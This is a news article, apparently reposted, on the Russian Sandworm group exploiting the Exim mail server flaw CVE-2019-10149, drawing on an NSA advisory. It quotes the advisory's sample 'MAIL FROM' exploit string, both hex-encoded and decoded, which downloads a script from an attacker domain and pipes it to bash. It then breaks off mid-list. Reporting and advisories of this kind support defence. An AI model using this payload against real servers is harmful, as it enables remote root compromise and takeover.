Russian hackers are exploiting bug that gives control of US servers

Sandworm group uses emails to send root commands to buggy Exim servers. …

Stylized photo of desktop computer.reader comments

27 with 16 posters participating

A Russian hacking group tied to power-grid attacks in Ukraine, the world’s most destructive data wiper worm, and other nefarious Kremlin operations is exploiting a vulnerability that allows it to take control of computers operated by the US government and its partners.

In an advisory published on Thursday, the US National Security Agency said that the Sandworm group was actively exploiting a vulnerability in Exim, an open source mail transfer agent, or MTA, for Unix-based operating systems. Tracked as CVE-2019-10149, the critical bug makes it possible for an unauthenticated remote attacker to send specially crafted emails that execute commands with root privileges. With that, the attacker can install programs of their choosing, modify data, and create new accounts.

A patch CVE-2019-10149 has been available since last June. The attacks have been active since at least August. NSA officials wrote:

The actors exploited victims using Exim software on their public facing MTAs by sending a command in the “MAIL FROM” field of an SMTP (Simple Mail Transfer Protocol) message. Below is a sample, which contains parameters the actor would modify per deployment.

MAILFROM:<${run{x2Fbinx2Fshtctx22execx20x2Fusrx2Fbinx2Fwgetx20x2DOx20x2Dx20http:x2Fx2Fhostapp.bex2Fscript1.shx20x7C x20bashx22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Figure 1: Sample “MAIL FROM” exploitation command

When CVE-2019-10149 is successfully exploited, an actor is able to execute code of their choosing. When Sandworm exploited CVE-2019-10149, the victim machine would subsequently download and execute a shell script from a Sandworm-controlled domain. This script would attempt to do the following on the victim machine: add privileged users disable network security settings update SSH configurations to enable additional remote access execute an additional script to

Continue reading – Article source

Similar Posts: